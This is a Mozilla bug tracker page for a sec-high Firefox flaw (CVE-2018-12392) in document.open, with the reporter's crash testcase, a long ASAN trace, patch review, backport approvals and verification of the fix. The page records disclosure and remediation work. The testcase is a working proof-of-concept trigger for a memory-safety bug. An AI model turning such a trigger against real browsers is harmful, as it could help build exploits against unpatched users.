Closed Bug 1492823 (CVE-2018-12392) Opened 2 years ago Closed 2 years ago

js::AssertSameCompartment failure in nsHTMLDocument::Open

Categories

(Core :: DOM: Core & HTML, defect, P1)

64 Branch
defect

Tracking

()

VERIFIED FIXED
mozilla64
Tracking Status
firefox-esr60 63+ verified
firefox62 --- wontfix
firefox63 + verified
firefox64 + verified

People

(Reporter: nils, Assigned: smaug)

Details

(Keywords: csectype-uaf, sec-high, Whiteboard: [post-critsmash-triage][adv-main63+][adv-esr60.3+])

Attachments

(5 files)

The following testcase crashes the lates ASAN build of Firefox 64.0a1 (BuildID=20180919100043). It looks like we have to win a race to trigger the issue, so it might require a few reloads/restarts.

<script>
function spin() {
        var x=new XMLHttpRequest();
        x.open("POST","https://mozilla.org",false);
        try{x.send("X");}catch(e){}
}
function start() {
	reloadurl = location.href;
	o707=window.document;
	o715=new WebSocket("ws://0.0.0.0");
	o731=o707.createElement('template');
	o707.onfocus=fun1;
	o715.onerror=fun0;
	spin();
}
function fun0() {
	o707.writeln("x");
}
function fun1() {
	x=o731.content;
	o707.execCommand('subscript',false,null);
	o707.open();
	window.top.setTimeout("window.top.location.href='"+reloadurl+"'",400);;
}
</script>
<body onload="start()"></body>


ASAN output:
AddressSanitizer:DEADLYSIGNAL
=================================================================
==28511==ERROR: AddressSanitizer: ILL on unknown address 0x55b844692b1f (pc 0x55b844692b1f bp 0x7ffd03e5ea70 sp 0x7ffd03e5e900 T0)
    #0 0x55b844692b1e in MOZ_CrashPrintf /builds/worker/workspace/build/src/mfbt/Assertions.cpp
    #1 0x7eff42067828 in fail /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:52:9
    #2 0x7eff42067828 in check /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:68
    #3 0x7eff42067828 in check /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:82
    #4 0x7eff42067828 in checkImpl<JSObject *> /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:194
    #5 0x7eff42067828 in check<JSObject *> /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:203
    #6 0x7eff42067828 in js::AssertSameCompartment(JSContext*, JSObject*) /builds/worker/workspace/build/src/js/src/jsfriendapi.cpp:418
    #7 0x7eff3a1724dd in mozilla::dom::ReparentWrapper(JSContext*, JS::Handle<JSObject*>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2279:3
    #8 0x7eff3aeb9ee3 in nsHTMLDocument::Open(JSContext*, mozilla::dom::Optional<nsTSubstring<char16_t> > const&, nsTSubstring<char16_t> const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:1532:11
    #9 0x7eff39b73a75 in mozilla::dom::HTMLDocument_Binding::open(JSContext*, JS::Handle<JSObject*>, nsHTMLDocument*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLDocumentBinding.cpp:215:53
    #10 0x7eff3a15d540 in bool mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions>(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3296:13
    #11 0x7eff42fa022b in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:461:15
    #12 0x7eff42fa022b in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:553
    #13 0x7eff42f89184 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:613:12
    #14 0x7eff42f89184 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3451
    #15 0x7eff42f6e1d0 in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:440:12
    #16 0x7eff42fa0d3e in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:580:15
    #17 0x7eff42fa2ad2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:626:10
    #18 0x7eff4202f45d in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2957:12
    #19 0x7eff3970a4b7 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:264:37
    #20 0x7eff3a9f3a4a in void mozilla::dom::EventHandlerNonNull::Call<nsISupports*>(nsISupports* const&, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&, char const*, mozilla::dom::CallbackObject::ExceptionHandling, JS::Realm*) /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:363:12
    #21 0x7eff3a9f0f8e in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214:12
    #22 0x7eff3a9a44d5 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1111:52
    #23 0x7eff3a9a66cc in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1342:20
    #24 0x7eff3a98a57e in HandleEvent /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventListenerManager.h:390:5
    #25 0x7eff3a98a57e in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:420
    #26 0x7eff3a9888a3 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:637:16
    #27 0x7eff3a98f172 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:1112:9
    #28 0x7eff3727d8e1 in FocusBlurEvent::Run() /builds/worker/workspace/build/src/dom/base/nsFocusManager.cpp:2077:12
    #29 0x7eff36c18186 in AddScriptRunner /builds/worker/workspace/build/src/dom/base/nsContentUtils.cpp:5674:13
    #30 0x7eff36c18186 in nsContentUtils::AddScriptRunner(nsIRunnable*) /builds/worker/workspace/build/src/dom/base/nsContentUtils.cpp:5681
    #31 0x7eff371bb3e3 in nsFocusManager::FireFocusOrBlurEvent(mozilla::EventMessage, nsIPresShell*, nsISupports*, bool, bool, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/base/nsFocusManager.cpp:2250:5
    #32 0x7eff371ba714 in nsFocusManager::FireDelayedEvents(nsIDocument*) /builds/worker/workspace/build/src/dom/base/nsFocusManager.cpp:1081:9
    #33 0x7eff3714d537 in FireOrClearDelayedEvents(nsTArray<nsCOMPtr<nsIDocument> >&, bool) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:9016:11
    #34 0x7eff3714cd10 in nsIDocument::UnsuppressEventHandlingAndFireEvents(bool) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:9332:5
    #35 0x7eff36cca940 in nsGlobalWindowInner::FreeInnerObjects() /builds/worker/workspace/build/src/dom/base/nsGlobalWindowInner.cpp:1211:13
    #36 0x7eff36d4a455 in nsGlobalWindowOuter::SetNewDocument(nsIDocument*, nsISupports*, bool) /builds/worker/workspace/build/src/dom/base/nsGlobalWindowOuter.cpp:1973:19
    #37 0x7eff3aeb9b20 in nsHTMLDocument::Open(JSContext*, mozilla::dom::Optional<nsTSubstring<char16_t> > const&, nsTSubstring<char16_t> const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:1498:22
    #38 0x7eff3aebebb4 in nsHTMLDocument::WriteCommon(JSContext*, nsTSubstring<char16_t> const&, bool, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:1768:38
    #39 0x7eff3aebdc20 in nsHTMLDocument::WriteCommon(JSContext*, mozilla::dom::Sequence<nsTString<char16_t> > const&, bool, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:1686:5
    #40 0x7eff39b77c81 in mozilla::dom::HTMLDocument_Binding::writeln(JSContext*, JS::Handle<JSObject*>, nsHTMLDocument*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLDocumentBinding.cpp:421:9
    #41 0x7eff3a15d540 in bool mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions>(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3296:13
    #42 0x7eff42fa022b in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:461:15
    #43 0x7eff42fa022b in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:553
    #44 0x7eff42f89184 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:613:12
    #45 0x7eff42f89184 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3451
    #46 0x7eff42f6e1d0 in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:440:12
    #47 0x7eff42fa0d3e in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:580:15
    #48 0x7eff42fa2ad2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:626:10
    #49 0x7eff4202f45d in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2957:12
    #50 0x7eff3970a4b7 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:264:37
    #51 0x7eff3a9f3a4a in void mozilla::dom::EventHandlerNonNull::Call<nsISupports*>(nsISupports* const&, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&, char const*, mozilla::dom::CallbackObject::ExceptionHandling, JS::Realm*) /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:363:12
    #52 0x7eff3a9f0f8e in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214:12
    #53 0x7eff3a9a44d5 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1111:52
    #54 0x7eff3a9a66cc in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1342:20
    #55 0x7eff3a98a57e in HandleEvent /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventListenerManager.h:390:5
    #56 0x7eff3a98a57e in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:420
    #57 0x7eff3a9888a3 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:637:16
    #58 0x7eff3a98f172 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:1112:9
    #59 0x7eff3a991ea6 in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsPresContext*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp
    #60 0x7eff3a945dc0 in mozilla::DOMEventTargetHelper::DispatchEvent(mozilla::dom::Event&, mozilla::dom::CallerType, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/events/DOMEventTargetHelper.cpp:185:5
    #61 0x7eff3a9ba039 in mozilla::dom::EventTarget::DispatchEvent(mozilla::dom::Event&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/events/EventTarget.cpp:213:13
    #62 0x7eff3ca34422 in mozilla::dom::WebSocket::CreateAndDispatchSimpleEvent(nsTSubstring<char16_t> const&) /builds/worker/workspace/build/src/dom/websocket/WebSocket.cpp:1955:3
    #63 0x7eff3ca434c9 in mozilla::dom::WebSocketImpl::DispatchConnectionCloseEvents() /builds/worker/workspace/build/src/dom/websocket/WebSocket.cpp:1920:18
    #64 0x7eff3ca47bb7 in mozilla::dom::CallDispatchConnectionCloseEvents::Run() /builds/worker/workspace/build/src/dom/websocket/WebSocket.cpp:262:21
    #65 0x7eff32f4bdd8 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1161:14
    #66 0x7eff32f54955 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:519:10
    #67 0x7eff3c927bb2 in SpinEventLoopUntil<mozilla::ProcessFailureBehavior::ReportToCaller, (lambda at /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:2937:31)> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:334:25
    #68 0x7eff3c927bb2 in mozilla::dom::XMLHttpRequestMainThread::SendInternal(mozilla::dom::BodyExtractorBase const*) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:2937
    #69 0x7eff3c925b80 in mozilla::dom::XMLHttpRequestMainThread::Send(JSContext*, mozilla::dom::Nullable<mozilla::dom::DocumentOrBlobOrArrayBufferViewOrArrayBufferOrFormDataOrURLSearchParamsOrUSVString> const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:2768:11
    #70 0x7eff39412c7f in mozilla::dom::XMLHttpRequest_Binding::send(JSContext*, JS::Handle<JSObject*>, mozilla::dom::XMLHttpRequest*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/XMLHttpRequestBinding.cpp:1277:9
    #71 0x7eff3a15d540 in bool mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions>(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3296:13
    #72 0x7eff42fa022b in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:461:15
    #73 0x7eff42fa022b in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:553
    #74 0x7eff42f89184 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:613:12
    #75 0x7eff42f89184 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3451
    #76 0x7eff42f6e1d0 in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:440:12
    #77 0x7eff42fa0d3e in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:580:15
    #78 0x7eff42fa2ad2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:626:10
    #79 0x7eff4202f45d in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2957:12
    #80 0x7eff3970a4b7 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:264:37
    #81 0x7eff3a9f3a4a in void mozilla::dom::EventHandlerNonNull::Call<nsISupports*>(nsISupports* const&, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&, char const*, mozilla::dom::CallbackObject::ExceptionHandling, JS::Realm*) /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:363:12
    #82 0x7eff3a9f0f8e in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214:12
    #83 0x7eff3a9a44d5 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1111:52
    #84 0x7eff3a9a66cc in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1342:20
    #85 0x7eff3a98a57e in HandleEvent /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventListenerManager.h:390:5
    #86 0x7eff3a98a57e in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:420
    #87 0x7eff3a9888a3 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:637:16
    #88 0x7eff3a98f172 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:1112:9
    #89 0x7eff3d5cbed8 in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1167:7
    #90 0x7eff40438f83 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7089:21
    #91 0x7eff40433ff7 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6882:7
    #92 0x7eff4043d447 in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp
    #93 0x7eff357eddd5 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1309:3
    #94 0x7eff357ec9bc in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:852:14
    #95 0x7eff357e84a9 in nsDocLoader::DocLoaderIsEmpty(bool) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:741:9
    #96 0x7eff357ead82 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:627:5
    #97 0x7eff357ec4e4 in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp
    #98 0x7eff331cc492 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:629:28
    #99 0x7eff37141107 in DoUnblockOnload /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:8471:18
    #100 0x7eff37141107 in nsDocument::UnblockOnload(bool) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:8393
    #101 0x7eff3711adfb in nsIDocument::DispatchContentLoadedEvents() /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:5252:3
    #102 0x7eff372871cb in applyImpl<nsIDocument, void (nsIDocument::*)()> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1178:12
    #103 0x7eff372871cb in apply<nsIDocument, void (nsIDocument::*)()> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1184
    #104 0x7eff372871cb in mozilla::detail::RunnableMethodImpl<nsIDocument*, void (nsIDocument::*)(), true, (mozilla::RunnableKind)0>::Run() /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1229
    #105 0x7eff32f0e3e5 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:337:32
    #106 0x7eff32f4bdd8 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1161:14
    #107 0x7eff32f54955 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:519:10
    #108 0x7eff3415ec33 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #109 0x7eff3406166c in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:325:10
    #110 0x7eff3406166c in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:318
    #111 0x7eff3406166c in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:298
    #112 0x7eff3cd4d5a3 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:158:27
    #113 0x7eff411dedde in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:939:22
    #114 0x7eff3406166c in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:325:10
    #115 0x7eff3406166c in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:318
    #116 0x7eff3406166c in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:298
    #117 0x7eff411ddf03 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:765:34
    #118 0x55b84461fb91 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:50:30
    #119 0x55b84461fb91 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:287
    #120 0x7eff550bdb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
    #121 0x55b84454ef3c in _start (/home/nils/fuzzer3/firefox/firefox+0x2cf3c)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: ILL /builds/worker/workspace/build/src/mfbt/Assertions.cpp in MOZ_CrashPrintf
==28511==ABORTING
Attached file ASAN output
compartment mismatch during wrapper reparenting
Group: core-security → dom-core-security
Jason, can you see if there could be something that needs fixing in XHR/Web Sockets here?
Component: DOM: Core & HTML → DOM: Networking
Flags: needinfo?(jduell.mcbugs)
Priority: -- → P1
I think this is unlikely to be related to XHR. The reason XHR is on the stack is that that's one of the ways that web content can trigger a nested event loop (which is presumably part of the issue here). We need somebody familiar with XPConnect / dom bindings to investigate.
Flags: needinfo?(jduell.mcbugs) → needinfo?(overholt)
Assignee: nobody → bugs
Component: DOM: Networking → DOM
Nothing to do with XPConnect or dom bindings either ;)
This is about document.open and replacing inner window and such.
This seems to crash pretty reliably even on debug build (non-asan), at least when loaded from a local file.
oh, this is a bit more fun than I thought. This is about template's document, and
related to https://bugzilla.mozilla.org/show_bug.cgi?id=1022869
We need at least this. Fixes the crash.


I will file a new bug about other issues
Attachment #9012513 - Flags: review?(peterv)
Flags: needinfo?(overholt)
Comment on attachment 9012513 [details] [diff] [review]
dont_unsupress_during_document_open.diff

Review of attachment 9012513 [details] [diff] [review]:
-----------------------------------------------------------------

::: dom/base/nsGlobalWindowInner.cpp
@@ +1148,5 @@
>    }
>  }
>  
>  void
> +nsGlobalWindowInner::FreeInnerObjects(bool aForDocumentOpen)

Maybe name this aUnsuppressEventHandling (reversing the values of course)?
Attachment #9012513 - Flags: review?(peterv) → review+
I actually wanted to use aForDocumentOpen since I expect that other might need it too.
And it is, IMO, easier to understand why such special case is happening.
Comment on attachment 9012513 [details] [diff] [review]
dont_unsupress_during_document_open.diff

[Security approval request comment]
How easily could an exploit be constructed based on the patch?
The patch does pin point to the issue, and actually, constructing at least a crash should be somewhat easy.

Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?
Commit message could be something like
-m "Bug 1492823, ensure user input suppression works correctly even after document.open, r=peterv"

Which older supported branches are affected by this flaw?
all

If not all supported branches, which bug introduced the flaw?
see above. (I think this has been an issue at least since bug 946641, FF28)

Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?
Looks like esr60 might need a separate patch, since bug 1451913 is the one which added handleDocumentOpen variable.

How likely is this patch to cause regressions; how much testing does it need?
I'd say rather unlikely to cause regressions. One needs to have document.open running inside sync xhr or so.
Attachment #9012513 - Flags: sec-approval?
We only have two betas left. This bug will need release management approval, so we can backport to affected branches, before I can give sec-approval.

Ritu?
Flags: needinfo?(rkothari)
OK to approve.
Flags: needinfo?(rkothari) → needinfo?(abillings)
Comment on attachment 9012513 [details] [diff] [review]
dont_unsupress_during_document_open.diff

sec-approval+ for trunk.
Can we get a beta and ESR60 patch made and nominated as well, to land after trunk?
Flags: needinfo?(abillings)
Attachment #9012513 - Flags: sec-approval? → sec-approval+
the patch applies to beta just fine.
Comment on attachment 9012513 [details] [diff] [review]
dont_unsupress_during_document_open.diff

[Beta/Release Uplift Approval Request]

Feature/Bug causing the regression: None

User impact if declined: 

Is this code covered by automated tests?: No

Has the fix been verified in Nightly?: Yes

Needs manual test from QE?: Yes

If yes, steps to reproduce: See comment 0

List of other uplifts needed: None

Risk to taking this patch: Low

Why is the change risky/not risky? (and alternatives if risky): 

String changes made/needed: NA
Attachment #9012513 - Flags: approval-mozilla-beta?
Hmm, I'm having trouble to reproduce in esr60, but I can't see why this wouldn't happen there.
Will upload a patch.
same for esr60, but this needs handleDocumentOpen
from https://bug1451913.bmoattachments.org/attachment.cgi?id=8967455
Attachment #9015291 - Flags: review?(peterv)
https://hg.mozilla.org/mozilla-central/rev/9d7540135cac
Group: dom-core-security → core-security-release
Status: NEW → RESOLVED
Closed: 2 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla64
Comment on attachment 9012513 [details] [diff] [review]
dont_unsupress_during_document_open.diff

Approved for 63.0b14. Will also approve for ESR 60.3 once the patch gets r+.
Attachment #9012513 - Flags: approval-mozilla-beta? → approval-mozilla-beta+
Flags: qe-verify+
Whiteboard: [post-critsmash-triage]
Attachment #9015291 - Flags: review?(peterv) → review+
Comment on attachment 9015291 [details] [diff] [review]
dont_unsupress_during_document_open_esr60.diff

Fixes a sec-high, approved for ESR 60.3.
Attachment #9015291 - Flags: approval-mozilla-esr60+
Verified, that the crash is no longer reproducible using the attached testcases, on latest Nightly 64 (asan and debug), latest Beta 63(asan and non-asan) and latest ESR from https://tools.taskcluster.net/index/gecko.v2.mozilla-esr60.latest.firefox
Status: RESOLVED → VERIFIED
Flags: qe-verify+
Whiteboard: [post-critsmash-triage] → [post-critsmash-triage][adv-main63+][adv-esr60.3+]
Alias: CVE-2018-12392
Flags: sec-bounty?
Flags: sec-bounty? → sec-bounty+
Component: DOM → DOM: Core & HTML
